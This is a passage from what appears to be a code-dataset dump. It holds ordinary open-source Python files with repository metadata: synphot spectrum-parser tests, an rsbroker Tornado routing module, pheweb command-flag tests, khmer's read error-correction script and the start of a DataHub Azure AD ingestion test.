'rn(bb(5000.0),box(5000.0,10.0),17.0,abmag)')
bb = SourceSpectrum(BlackBodyNorm1D, temperature=5000 * u.K)
box = SpectralElement(Box1D, amplitude=1, x_0=5000 * u.AA, width=10 * u.AA)
sp2 = bb.normalize(17 * u.ABmag, band=box)
_compare_spectra(sp1, sp2)
def test_z_null():
"""ETC junk spectrum results in flat spectrum with no redshift."""
sp1 = spparser.parse_spec('z(null, 0.1)')
_single_functioncall(sp1, SourceSpectrum, ConstFlux1D, 'z(null,0.1)')
sp2 = SourceSpectrum(ConstFlux1D, amplitude=1 * units.PHOTLAM)
_compare_spectra(sp1, sp2)
def test_z_em():
sp1 = spparser.parse_spec('z(em(5000, 25, 1, flam), 0.1)')
_single_functioncall(
sp1, SourceSpectrum, None, 'z(em(5000, 25, 1, FLAM),0.1)', ans_z=0.1)
f = 1 * (units.FLAM * u.AA) # Integrated flux
sp2 = SourceSpectrum(
GaussianFlux1D, mean=5000 * u.AA, fwhm=25 * u.AA, total_flux=f)
sp2.z = 0.1
_compare_spectra(sp1, sp2)
@pytest.mark.remote_data
def test_remote_spec_vegafile():
sp1 = spparser.parse_spec('spec(crcalspec$alpha_lyr_stis_007.fits)')
_single_functioncall(sp1, SourceSpectrum, Empirical1D,
'spec(crcalspec$alpha_lyr_stis_007.fits)')
sp2 = SourceSpectrum.from_file(resolve_filename(
os.environ['PYSYN_CDBS'], 'calspec', 'alpha_lyr_stis_007.fits'))
_compare_spectra(sp1, sp2)
@pytest.mark.remote_data
def test_remote_band_v():
sp1 = spparser.parse_spec('band(v)')
_single_functioncall(
sp1, spectrum.ObservationSpectralElement, Empirical1D, 'band(v)',
ans_z=None)
sp2 = SpectralElement.from_filter('johnson_v')
_compare_spectra(sp1, sp2)
@pytest.mark.remote_data
def test_remote_icat_k93():
sp1 = spparser.parse_spec('icat(k93models, 5000, 0.5, 0)')
_single_functioncall(sp1, SourceSpectrum, Empirical1D,
'k93models(T_eff=5000,metallicity=0.5,log_g=0)')
sp2 = catalog.grid_to_spec('k93models', 5000, 0.5, 0)
_compare_spectra(sp1, sp2)
@pytest.mark.remote_data
def test_remote_ebmvx_mwavg():
sp1 = spparser.parse_spec('ebmvx(0.3, mwavg)')
_single_functioncall(
sp1, ExtinctionCurve, Empirical1D, 'ebmvx(0.3,mwavg)', ans_z=None)
sp2 = spectrum.ebmvx('mwavg', 0.3)
_compare_spectra(sp1, sp2)
@pytest.mark.remote_data
def test_remote_rn_calspec_box():
sp1 = spparser.parse_spec(
'rn(crcalspec$gd71_mod_005.fits, box(5000, 10), 17, vegamag)')
_single_functioncall(
sp1, SourceSpectrum, None,
'rn(crcalspec$gd71_mod_005.fits,box(5000.0,10.0),17.0,vegamag)')
gd71 = SourceSpectrum.from_file(resolve_filename(
os.environ['PYSYN_CDBS'], 'calspec', 'gd71_mod_005.fits'))
box = SpectralElement(Box1D, amplitude=1, x_0=5000 * u.AA, width=10 * u.AA)
sp2 = gd71.normalize(17 * units.VEGAMAG, band=box, vegaspec=spectrum.Vega)
_compare_spectra(sp1, sp2)
@pytest.mark.remote_data
def test_remote_rn_icat_k93():
sp1 = spparser.parse_spec(
'rn(icat(k93models, 5000, 0.5, 0), '
'cracscomp$acs_f814w_hrc_006_syn.fits, 17, obmag)')
_single_functioncall(
sp1, SourceSpectrum, None,
'rn(k93models(T_eff=5000,metallicity=0.5,log_g=0),'
'cracscomp$acs_f814w_hrc_006_syn.fits,17.0,obmag)')
k93 = catalog.grid_to_spec('k93models', 5000, 0.5, 0)
bp = SpectralElement.from_file(resolve_filename(
os.environ['PYSYN_CDBS'], 'comp', 'acs', 'acs_f814w_hrc_006_syn.fits'))
sp2 = k93.normalize(17 * units.OBMAG, band=bp, area=conf.area)
_compare_spectra(sp1, sp2)
@pytest.mark.remote_data
def test_remote_rn_powerlaw():
sp1 = spparser.parse_spec('rn(pl(5000, 1, flam), band(v), 1, photlam)')
_single_functioncall(sp1, SourceSpectrum, None,
'rn(pl(5000.0,1.0,flam),band(v),1.0,photlam)')
pl = SourceSpectrum(PowerLawFlux1D, amplitude=1 * units.FLAM,
x_0=5000 * u.AA, alpha=-1)
bp = SpectralElement.from_filter('johnson_v')
sp2 = pl.normalize(1 * units.PHOTLAM, band=bp)
_compare_spectra(sp1, sp2)
@pytest.mark.remote_data
def test_remote_rn_unit_1_flam():
sp1 = spparser.parse_spec(
'rn(unit(1,flam), band(acs, wfc1, fr388n#3881.0), 10, abmag)')
_single_functioncall(
sp1, SourceSpectrum, None,
'rn(unit(1.0,flam),band(acs,wfc1,fr388n#3881.0),10.0,abmag)')
constsp = SourceSpectrum(ConstFlux1D, amplitude=1 * units.FLAM)
bp = spectrum.band('acs, wfc1, fr388n#3881.0')
sp2 = constsp.normalize(10 * u.ABmag, band=bp)
_compare_spectra(sp1, sp2)
@pytest.mark.remote_data
def test_remote_rn_calspec_u():
sp1 = spparser.parse_spec(
'rn(crcalspec$bd_75d325_stis_002.fits, band(u), 9.5, vegamag) * '
'band(fos, blue, 4.3, g160l)')
# NOTE: No expr for this combo.
_single_functioncall(sp1, SourceSpectrum, None, '')
bd75 = SourceSpectrum.from_file(resolve_filename(
os.environ['PYSYN_CDBS'], 'calspec', 'bd_75d325_stis_002.fits'))
bp_u = SpectralElement.from_filter('johnson_u')
bd75_norm = bd75.normalize(
9.5 * units.VEGAMAG, band=bp_u, vegaspec=spectrum.Vega)
bp_fos = spectrum.band('fos, blue, 4.3, g160l')
sp2 = bd75_norm * bp_fos
_compare_spectra(sp1, sp2)
@pytest.mark.remote_data
def test_remote_z_vega():
sp1 = spparser.parse_spec('z(crcalspec$alpha_lyr_stis_007.fits, 0.1)')
_single_functioncall(sp1, SourceSpectrum, None,
'z(crcalspec$alpha_lyr_stis_007.fits,0.1)', ans_z=0.1)
sp2 = SourceSpectrum.from_file(resolve_filename(
os.environ['PYSYN_CDBS'], 'calspec', 'alpha_lyr_stis_007.fits'))
sp2.z = 0.1
_compare_spectra(sp1, sp2)
@pytest.mark.remote_data
class TestRenormPartialOverlap:
"""Test handling of ``rn(...)`` syntax for partial overlap."""
def setup_class(self):
self.fname = resolve_filename(
conf.rootdir, 'etc', 'source', 'qso_fos_001.dat')
def test_partial(self):
"""Warning only."""
input_str = f'rn({self.fname}, band(johnson, u), 15, abmag)'
with pytest.warns(AstropyUserWarning,
match=r'Spectrum is not defined everywhere'):
sp = spparser.parse_spec(input_str)
assert isinstance(sp, SourceSpectrum)
assert 'force_renorm' in sp.warnings
name = sp.meta['expr']
assert (name.startswith('rn(') and
name.endswith('qso_fos_001.dat,band(johnson,u),15.0,abmag)'))
def test_disjoint(self):
"""Raise error."""
input_str = f'rn({self.fname}, band(johnson, v), 15, abmag)'
with pytest.raises(synexceptions.DisjointError):
spparser.parse_spec(input_str)
@pytest.mark.remote_data
class TestEnvVar:
"""Test syntax using PYSYN_CDBS environment variable."""
def setup_class(self):
self.old_path = os.environ.get('PYSYN_CDBS')
if self.old_path is None:
os.environ['PYSYN_CDBS'] = conf.rootdir
def test_double_slash(self):
sp = spparser.parse_spec(
'spec($PYSYN_CDBS//calspec/gd71_mod_005.fits)')
assert isinstance(sp, SourceSpectrum)
assert isinstance(sp.model, Empirical1D)
def teardown_class(self):
if self.old_path is None:
del os.environ['PYSYN_CDBS']
@pytest.mark.parametrize(
'input_str',
['foo(1)',
'unit(1, nm)',
'unit(1, vegamag)',
'pl(5000, 1, nm)',
'pl(5000, 1, vegamag)',
'em(5000, 25, 1, nm)',
'rn(bb(5000), foo(v), 17, obmag)',
'rn(unit(1, flam), band(stis, ccd, g430m, c4451, 52X0.2), 10, abmag)',
'rn(unit(1, flam), band(stis, ccd, mirror, 50CCD), 10, abmag)',
'ebmvx(0.3, foo)'])
def test_parser_exception(input_str):
"""Test syntax that raises ParserError."""
with pytest.raises(exceptions.ParserError):
spparser.parse_spec(input_str)
class TestTokens:
"""Test underlying parser engine."""
def setup_class(self):
self.scanner = spparser.Scanner()
@pytest.mark.parametrize(
('token_type', 'token_str'),
[('FLOAT', '.1'),
('FLOAT', '1.1'),
('FLOAT', '1.'),
('FLOAT', '1'),
('FLOAT', '.1e+1'),
('FLOAT', '1.1e+1'),
('FLOAT', '1.e+1'),
('FLOAT', '1e+1'),
('FLOAT', '.1e-1'),
('FLOAT', '1.1e-1'),
('FLOAT', '1.e-1'),
('FLOAT', '1e-1'),
('FLOAT', '.1e1'),
('FLOAT', '1.1e1'),
('FLOAT', '1.e1'),
('FLOAT', '1e1'),
('IDENTIFIER', '/'),
('IDENTIFIER', 'xyzzy'),
('IDENTIFIER', 'xy20zzy'),
('IDENTIFIER', 'xyzzy20'),
('IDENTIFIER', '/a/b/c'),
('IDENTIFIER', 'foo$bar'),
('IDENTIFIER', 'a/b'),
('IDENTIFIER', '/a/b/c/foo.fits'),
('IDENTIFIER', 'C:/a/b/c/foo.fits')])
def test_single_token_1(self, token_type, token_str):
t = self.scanner.tokenize(token_str)
assert (t[0].type, t[0].attr) == (token_type, token_str)
@pytest.mark.parametrize(
('token_str', 'ans'),
[('(', ('LPAREN', None)),
(')', ('RPAREN', None)),
(',', (',', None)),
('+', ('+', None)),
('*', ('*', None)),
('@foolist', ('FILELIST', 'foolist'))])
def test_single_token_2(self, token_str, ans):
t = self.scanner.tokenize(token_str)
assert (t[0].type, t[0].attr) == ans
@pytest.mark.parametrize(
('input_str', 'ans'),
[('50CCD',
[('FLOAT', '50'),
('IDENTIFIER', 'CCD')]),
('500X0.2',
[('FLOAT', '500'),
('IDENTIFIER', 'X0.2')]),
('spec($PYSYN_CDBS//calspec/gd71_mod_005.fits)',
[('IDENTIFIER', 'spec'),
('LPAREN', None),
('IDENTIFIER', '$PYSYN_CDBS//calspec/gd71_mod_005.fits'),
('RPAREN', None)]),
('spec(earthshine.fits) * 0.5 + '
'rn(spec(Zodi.fits), band(johnson, v), 22.7, vegamag) + '
'(spec(el1215a.fits) + spec(el1302a.fits) + spec(el1356a.fits) + '
'spec(el2471a.fits)) * 0.5',
[('IDENTIFIER', 'spec'),
('LPAREN', None),
('IDENTIFIER', 'earthshine.fits'),
('RPAREN', None),
('*', None),
('FLOAT', '0.5'),
('+', None),
('IDENTIFIER', 'rn'),
('LPAREN', None),
('IDENTIFIER', 'spec'),
('LPAREN', None),
('IDENTIFIER', 'Zodi.fits'),
('RPAREN', None),
(',', None),
('IDENTIFIER', 'band'),
('LPAREN', None),
('IDENTIFIER', 'johnson'),
(',', None),
('IDENTIFIER', 'v'),
('RPAREN', None),
(',', None),
('FLOAT', '22.7'),
(',', None),
('IDENTIFIER', 'vegamag'),
('RPAREN', None),
('+', None),
('LPAREN', None),
('IDENTIFIER', 'spec'),
('LPAREN', None),
('IDENTIFIER', 'el1215a.fits'),
('RPAREN', None),
('+', None),
('IDENTIFIER', 'spec'),
('LPAREN', None),
('IDENTIFIER', 'el1302a.fits'),
('RPAREN', None),
('+', None),
('IDENTIFIER', 'spec'),
('LPAREN', None),
('IDENTIFIER', 'el1356a.fits'),
('RPAREN', None),
('+', None),
('IDENTIFIER', 'spec'),
('LPAREN', None),
('IDENTIFIER', 'el2471a.fits'),
('RPAREN', None),
('RPAREN', None),
('*', None),
('FLOAT', '0.5')]),
('spec(earthshine.fits) * 0.5 + '
'rn(spec(Zodi.fits), band(johnson, v), 22.7, vegamag) + '
'(spec(el1215a.fits) * 0.1 + spec(el1302a.fits) * 0.066666667 + '
'spec(el1356a.fits) * 0.0060 + spec(el2471a.fits) * 0.0050)',
[('IDENTIFIER', 'spec'),
('LPAREN', None),
('IDENTIFIER', 'earthshine.fits'),
('RPAREN', None),
('*', None),
('FLOAT', '0.5'),
('+', None),
('IDENTIFIER', 'rn'),
('LPAREN', None),
('IDENTIFIER', 'spec'),
('LPAREN', None),
('IDENTIFIER', 'Zodi.fits'),
('RPAREN', None),
(',', None),
('IDENTIFIER', 'band'),
('LPAREN', None),
('IDENTIFIER', 'johnson'),
(',', None),
('IDENTIFIER', 'v'),
('RPAREN', None),
(',', None),
('FLOAT', '22.7'),
(',', None),
('IDENTIFIER', 'vegamag'),
('RPAREN', None),
('+', None),
('LPAREN', None),
('IDENTIFIER', 'spec'),
('LPAREN', None),
('IDENTIFIER', 'el1215a.fits'),
('RPAREN', None),
('*', None),
('FLOAT', '0.1'),
('+', None),
('IDENTIFIER', 'spec'),
('LPAREN', None),
('IDENTIFIER', 'el1302a.fits'),
('RPAREN', None),
('*', None),
('FLOAT', '0.066666667'),
('+', None),
('IDENTIFIER', 'spec'),
('LPAREN', None),
('IDENTIFIER', 'el1356a.fits'),
('RPAREN', None),
('*', None),
('FLOAT', '0.0060'),
('+', None),
('IDENTIFIER', 'spec'),
('LPAREN', None),
('IDENTIFIER', 'el2471a.fits'),
('RPAREN', None),
('*', None),
('FLOAT', '0.0050'),
('RPAREN', None)]),
('spec(earthshine.fits) * 0.5 + '
'rn(spec(Zodi.fits), band(johnson, v), 22.7, vegamag) + '
'(spec(el1215a.fits) + spec(el1302a.fits) + spec(el1356a.fits) + '
'spec(el2471a.fits))',
[('IDENTIFIER', 'spec'),
('LPAREN', None),
('IDENTIFIER', 'earthshine.fits'),
('RPAREN', None),
('*', None),
('FLOAT', '0.5'),
('+', None),
('IDENTIFIER', 'rn'),
('LPAREN', None),
('IDENTIFIER', 'spec'),
('LPAREN', None),
('IDENTIFIER', 'Zodi.fits'),
('RPAREN', None),
(',', None),
('IDENTIFIER', 'band'),
('LPAREN', None),
('IDENTIFIER', 'johnson'),
(',', None),
('IDENTIFIER', 'v'),
('RPAREN', None),
(',', None),
('FLOAT', '22.7'),
(',', None),
('IDENTIFIER', 'vegamag'),
('RPAREN', None),
('+', None),
('LPAREN', None),
('IDENTIFIER', 'spec'),
('LPAREN', None),
('IDENTIFIER', 'el1215a.fits'),
('RPAREN', None),
('+', None),
('IDENTIFIER', 'spec'),
('LPAREN', None),
('IDENTIFIER', 'el1302a.fits'),
('RPAREN', None),
('+', None),
('IDENTIFIER', 'spec'),
('LPAREN', None),
('IDENTIFIER', 'el1356a.fits'),
('RPAREN', None),
('+', None),
('IDENTIFIER', 'spec'),
('LPAREN', None),
('IDENTIFIER', 'el2471a.fits'),
('RPAREN', None),
('RPAREN', None)])])
def test_composite_token(self, input_str, ans):
t = self.scanner.tokenize(input_str)
for expect, actual in zip(ans, t):
assert (actual.type, actual.attr) == expect
def teardown_module():
"""Clear all cache."""
catalog.reset_cache()
observationmode.reset_cache()
spectrum.reset_cache()
| 33.447552 | 79 | 0.559011 | 9,145 | 0.477995 | 0 | 0 | 14,317 | 0.748327 | 0 | 0 | 6,032 | 0.315283 |
9082f22e3410593d0f53f454a62bd2d756d1a9be | 554 | py | Python | rsbroker/urls.py | land-pack/RsBroker | d556fda09582e0540cac0eabc163a984e8fc1c44 | [
"Apache-2.0"
]
| null | null | null | rsbroker/urls.py | land-pack/RsBroker | d556fda09582e0540cac0eabc163a984e8fc1c44 | [
"Apache-2.0"
]
| null | null | null | rsbroker/urls.py | land-pack/RsBroker | d556fda09582e0540cac0eabc163a984e8fc1c44 | [
"Apache-2.0"
]
| null | null | null | from __future__ import absolute_import
import os
from tornado.web import StaticFileHandler
from rsbroker.views import websocket
from rsbroker.views.error import NotFoundErrorHandler
settings = dict(
template_path=os.path.join(os.path.dirname(__file__), "templates"),
static_path=os.path.join(os.path.dirname(__file__), "static")
)
handlers = [
# Http api
# Events WebSocket API
(r"/api/ws", websocket.BrokerServerHandler),
# Static
(r"/static/(.*)", StaticFileHandler),
# Error
(r".*", NotFoundErrorHandler)
]
| 20.518519 | 71 | 0.714801 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 96 | 0.173285 |
9083f275a59b9bf245934e27e32ceb9469c2cb0d | 6,465 | py | Python | tests/pheweb/load/command_flags_test.py | stellakeppo/pheweb | 10ea317dbe9419fa77f99e6b735fa9a3290ccd5e | [
"MIT"
]
| 4 | 2018-11-03T13:58:52.000Z | 2020-03-06T09:19:03.000Z | tests/pheweb/load/command_flags_test.py | stellakeppo/pheweb | 10ea317dbe9419fa77f99e6b735fa9a3290ccd5e | [
"MIT"
]
| 92 | 2018-05-17T18:07:01.000Z | 2022-03-29T00:37:30.000Z | tests/pheweb/load/command_flags_test.py | stellakeppo/pheweb | 10ea317dbe9419fa77f99e6b735fa9a3290ccd5e | [
"MIT"
]
| 4 | 2020-07-01T12:20:55.000Z | 2022-01-24T20:09:15.000Z | # -*- coding: utf-8 -*-
"""
Unit testing for command flags.
This tests the various command flags
and there helper methods.
"""
import argparse
import typing
import uuid
import pytest
from pheweb.load.command_flags import (
FLAG_CHROMOSOME,
add_chromosome_flag,
OUTPUT_COLUMN_CHROMOSOME,
FLAG_POSITION,
add_position_flag,
FLAG_REFERENCE,
add_reference_flag,
FLAG_ALTERNATIVE,
add_alternate_flag,
OUTPUT_COLUMN_REFERENCE,
OUTPUT_COLUMN_ALTERNATIVE,
FLAG_P_VALUE,
add_p_value_flag,
OUTPUT_COLUMN_P_VALUE,
FLAG_M_LOG_P_VALUE,
add_m_log_p_value_flag,
OUTPUT_COLUMN_M_LOG_P_VALUE,
add_beta_value_flag,
FLAG_BETA,
OUTPUT_COLUMN_BETA,
FLAG_SE_BETA,
add_se_beta_value_flag,
OUTPUT_COLUMN_SE_BETA,
OUTPUT_COLUMN_POSITION,
add_in_file_value_flag,
DEFAULT_IN_FILE,
add_out_file_value_flag,
DEFAULT_OUT_FILE,
add_rename_value_flag,
DEFAULT_RENAME,
add_exclude_value_flag,
FLAG_EXCLUDE,
FLAG_RENAME,
DEFAULT_EXCLUDE,
parse_exclude_args,
parse_rename_args,
)
def test_exclude_args() -> None:
"""
Test exclude args.
@return: None
"""
assert parse_exclude_args("") == set()
assert parse_exclude_args("a") == {"a"}
assert parse_exclude_args("a,b") == {"a", "b"}
assert parse_exclude_args("a,b,c") == {"a", "b", "c"}
def test_rename_args() -> None:
"""
Test rename args.
@return: None
"""
assert not parse_rename_args("")
assert parse_rename_args("a:b") == {"a": "b"}
assert parse_rename_args("a:b,c:d") == {"a": "b", "c": "d"}
with pytest.raises(ValueError):
assert parse_rename_args("a")
def parse_harness(
cli_argv: typing.List[str],
parse_method: typing.Callable[[argparse.ArgumentParser], None],
):
"""
Parse harness.
Calls the argument parser with the parse method.
Then calls the argument parse with the cli argv.
@param cli_argv: arguments to pass to parser
@param parse_method: parse set up method
@return: result of the parse
"""
parser = argparse.ArgumentParser(description=f"test : {parse_method}")
parse_method(parser)
return parser.parse_args(cli_argv)
def test_add_chromosome() -> None:
"""
Test arguments for chromosome column.
@return: None
"""
chromosome = str(uuid.uuid4())
arguments = parse_harness([FLAG_CHROMOSOME, chromosome], add_chromosome_flag)
assert arguments.chromosome == chromosome
assert parse_harness([], add_chromosome_flag).chromosome is OUTPUT_COLUMN_CHROMOSOME
def test_add_position():
"""
Test arguments for position column.
@return: None
"""
position = str(uuid.uuid4())
arguments = parse_harness([FLAG_POSITION, position], add_position_flag)
assert arguments.position == position
assert parse_harness([], add_position_flag).position is OUTPUT_COLUMN_POSITION
def test_add_ref() -> None:
"""
Test arguments for alternative column.
@return: None
"""
reference = str(uuid.uuid4())
arguments = parse_harness([FLAG_REFERENCE, reference], add_reference_flag)
assert arguments.reference == reference
assert parse_harness([], add_reference_flag).reference is OUTPUT_COLUMN_REFERENCE
def test_add_alt() -> None:
"""
Test arguments for alternative column.
@return: None
"""
alternative = str(uuid.uuid4())
arguments = parse_harness([FLAG_ALTERNATIVE, alternative], add_alternate_flag)
assert arguments.alternative == alternative
assert (
parse_harness([], add_alternate_flag).alternative is OUTPUT_COLUMN_ALTERNATIVE
)
def test_add_p_value() -> None:
"""
Test arguments for p-value column.
@return: None
"""
p_value = str(uuid.uuid4())
arguments = parse_harness([FLAG_P_VALUE, p_value], add_p_value_flag)
assert arguments.p_value == p_value
assert parse_harness([], add_p_value_flag).p_value == OUTPUT_COLUMN_P_VALUE
def test_add_m_log_p_value() -> None:
"""
Test arguments for m log p value column.
@return: None
"""
m_log_p_value = str(uuid.uuid4())
arguments = parse_harness(
[FLAG_M_LOG_P_VALUE, m_log_p_value], add_m_log_p_value_flag
)
assert arguments.m_log_p_value == m_log_p_value
arguments = parse_harness([], add_m_log_p_value_flag)
assert arguments.m_log_p_value == OUTPUT_COLUMN_M_LOG_P_VALUE
def test_add_beta() -> None:
"""
Test arguments for beta column.
@return: None
"""
beta = str(uuid.uuid4())
arguments = parse_harness([FLAG_BETA, beta], add_beta_value_flag)
assert arguments.beta == beta
assert parse_harness([], add_beta_value_flag).beta == OUTPUT_COLUMN_BETA
def test_add_se_beta() -> None:
"""
Test arguments for beta column.
@return: None
"""
se_beta = str(uuid.uuid4())
arguments = parse_harness([FLAG_SE_BETA, se_beta], add_se_beta_value_flag)
assert arguments.se_beta == se_beta
assert parse_harness([], add_se_beta_value_flag).se_beta == OUTPUT_COLUMN_SE_BETA
def test_add_exclude() -> None:
"""
Test argument for columns to exclude.
@return: None
"""
exclude = str(uuid.uuid4())
arguments = parse_harness([FLAG_EXCLUDE, exclude], add_exclude_value_flag)
assert arguments.exclude == exclude
assert parse_harness([], add_exclude_value_flag).exclude == DEFAULT_EXCLUDE
def test_add_rename() -> None:
"""
Test arguments for rename.
@return: None
"""
new_name = str(uuid.uuid4())
old_name = str(uuid.uuid4())
rename = f"{old_name}:{new_name}"
arguments = parse_harness([FLAG_RENAME, rename], add_rename_value_flag)
assert arguments.rename == rename
assert parse_harness([], add_rename_value_flag).rename == DEFAULT_RENAME
def test_parse_out_file() -> None:
"""
Test arguments for out file.
@return: None
"""
out_file = str(uuid.uuid4())
arguments = parse_harness(["--out-file", out_file], add_out_file_value_flag)
assert arguments.out_file == out_file
assert parse_harness([], add_out_file_value_flag).out_file == DEFAULT_OUT_FILE
def test_add_in_file() -> None:
"""
Test arguments for input file.
@return: None
"""
in_file = str(uuid.uuid4())
assert parse_harness([in_file], add_in_file_value_flag).in_file == in_file
assert parse_harness([], add_in_file_value_flag).in_file == DEFAULT_IN_FILE
| 26.174089 | 88 | 0.692653 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,454 | 0.224903 |
9085232046fc5765251336d07c6534499f1401bb | 4,388 | py | Python | sandbox/error-correct-pass2.py | sadeepdarshana/khmer | bee54c4f579611d970c59367323d31d3545cafa6 | [
"CNRI-Python"
]
| 558 | 2015-05-22T15:03:21.000Z | 2022-03-23T04:49:17.000Z | sandbox/error-correct-pass2.py | sadeepdarshana/khmer | bee54c4f579611d970c59367323d31d3545cafa6 | [
"CNRI-Python"
]
| 1,057 | 2015-05-14T20:27:04.000Z | 2022-03-08T09:29:36.000Z | sandbox/error-correct-pass2.py | sadeepdarshana/khmer | bee54c4f579611d970c59367323d31d3545cafa6 | [
"CNRI-Python"
]
| 193 | 2015-05-18T10:13:34.000Z | 2021-12-10T11:58:01.000Z | #! /usr/bin/env python
# This file is part of khmer, https://github.com/dib-lab/khmer/, and is
# Copyright (C) 2011-2015, Michigan State University.
# Copyright (C) 2015, The Regents of the University of California.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
#
# * Neither the name of the Michigan State University nor the names
# of its contributors may be used to endorse or promote products
# derived from this software without specific prior written
# permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Contact: [email protected]
"""
Error correct reads based on a counting hash from a diginorm step.
Output sequences will be put in inputfile.corr.
% python scripts/error-correct-pass2 <counting.ct> <data1> [ <data2> <...> ]
Use '-h' for parameter help.
"""
import sys
import os
import screed
import khmer
from khmer import Countgraph
from khmer import khmer_args
from khmer.khmer_args import FileType as khFileType
DEFAULT_CUTOFF = 2
def output_single(read, new_sequence):
name = read.name
sequence = new_sequence
quality = None
if hasattr(read, 'quality'):
quality = read.quality[:len(sequence)]
sequence = sequence[:len(quality)] # sequence is _lengthened_
if quality:
assert len(sequence) == len(quality), (sequence, quality)
return "@%s\n%s\n+\n%s\n" % (name, sequence, quality)
else:
return ">%s\n%s\n" % (name, sequence)
def main():
parser = khmer_args.build_counting_args(
"Correct reads against an already-computed table",
citations=['counting', 'SeqAn'])
parser.add_argument("--trusted-cov", dest="trusted_cov", type=int,
default=DEFAULT_CUTOFF)
parser.add_argument("--theta", dest="bits_theta", type=float, default=1.0)
parser.add_argument('-o', '--output', dest='output_file',
help="output file for histogram; defaults to "
"<first filename>.corr in cwd.",
type=khFileType('w'), default=None)
parser.add_argument('counts_table')
parser.add_argument('readfile')
args = parser.parse_args()
print('loading counts')
ht = Countgraph.load(args.counts_table)
aligner = khmer.ReadAligner(ht,
args.trusted_cov,
args.bits_theta)
print("trusted:", args.trusted_cov)
corrfp = args.output_file
if not corrfp:
outfile = os.path.basename(args.readfile) + '.corr'
corrfp = open(outfile, 'w')
n_corrected = 0
for n, read in enumerate(screed.open(args.readfile)):
if n % 10000 == 0:
print('...', n, n_corrected, file=sys.stderr)
seq = read.sequence.replace('N', 'A')
# build the alignment...
score, graph_alignment, read_alignment, truncated = \
aligner.align(seq)
if not truncated:
graph_seq = graph_alignment.replace("-", "")
if graph_seq != seq:
n_corrected += 1
seq = graph_seq
corrfp.write(output_single(read, seq))
if __name__ == '__main__':
main()
| 35.104 | 78 | 0.66773 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2,381 | 0.542616 |
908535dac0f891e497250dce7197eb9409ed8be9 | 7,745 | py | Python | metadata-ingestion/tests/integration/azure_ad/test_azure_ad.py | zhoxie-cisco/datahub | 254a73e6ca9b1ec6002fcf013ed42cb6a754d1ad | [
"Apache-2.0"
]
| 1 | 2021-11-16T03:45:33.000Z | 2021-11-16T03:45:33.000Z | metadata-ingestion/tests/integration/azure_ad/test_azure_ad.py | zhoxie-cisco/datahub | 254a73e6ca9b1ec6002fcf013ed42cb6a754d1ad | [
"Apache-2.0"
]
| 4 | 2022-03-02T03:01:24.000Z | 2022-03-23T00:57:33.000Z | metadata-ingestion/tests/integration/azure_ad/test_azure_ad.py | zhoxie-cisco/datahub | 254a73e6ca9b1ec6002fcf013ed42cb6a754d1ad | [
"Apache-2.0"
]
| 5 | 2021-07-26T08:37:42.000Z | 2021-11-16T05:41:02.000Z | import json
import pathlib
from unittest.mock import patch
from freezegun import freeze_time
from datahub.ingestion.run.pipeline import Pipeline
from datahub.ingestion.source.identity.azure_ad import AzureADConfig
from tests.test_helpers import mce_helpers
FROZEN_TIME = "2021-08-24 09:00:00"
def test_azure_ad_config():
config = AzureADConfig.parse_obj(
dict(
client_id="00000000-0000-0000-0000-000000000000",
tenant_id="00000000-0000-0000-0000-000000000000",
client_secret="xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx",
redirect="https://login.microsoftonline.com/common/oauth2/nativeclient",
authority="https://login.microsoftonline.com/00000000-0000-0000-0000-000000000000",
token_url="https://login.microsoftonline.com/00000000-0000-0000-0000-000000000000/oauth2/token",
graph_url="https://graph.microsoft.com/v1.0",
ingest_users=True,
ingest_groups=True,
ingest_group_membership=True,
)
)
# Sanity on required configurations
assert config.client_id == "00000000-0000-0000-0000-000000000000"
assert config.tenant_id == "00000000-0000-0000-0000-000000000000"
assert config.client_secret == "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"
assert (
config.redirect
== "https://login.microsoftonline.com/common/oauth2/nativeclient"
)
assert (
config.authority
== "https://login.microsoftonline.com/00000000-0000-0000-0000-000000000000"
)
assert (
config.token_url
== "https://login.microsoftonline.com/00000000-0000-0000-0000-000000000000/oauth2/token"
)
assert config.graph_url == "https://graph.microsoft.com/v1.0"
# assert on defaults
assert config.ingest_users
assert config.ingest_groups
assert config.ingest_group_membership
@freeze_time(FROZEN_TIME)
def test_azure_ad_source_default_configs(pytestconfig, tmp_path):
test_resources_dir: pathlib.Path = (
pytestconfig.rootpath / "tests/integration/azure_ad"
)
with patch(
"datahub.ingestion.source.identity.azure_ad.AzureADSource.get_token"
) as mock_token, patch(
"datahub.ingestion.source.identity.azure_ad.AzureADSource._get_azure_ad_users"
) as mock_users, patch(
"datahub.ingestion.source.identity.azure_ad.AzureADSource._get_azure_ad_groups"
) as mock_groups, patch(
"datahub.ingestion.source.identity.azure_ad.AzureADSource._get_azure_ad_group_users"
) as mock_group_users:
mocked_functions(
test_resources_dir, mock_token, mock_users, mock_groups, mock_group_users
)
# Run an azure usage ingestion run.
pipeline = Pipeline.create(
{
"run_id": "test-azure-ad",
"source": {
"type": "azure-ad",
"config": {
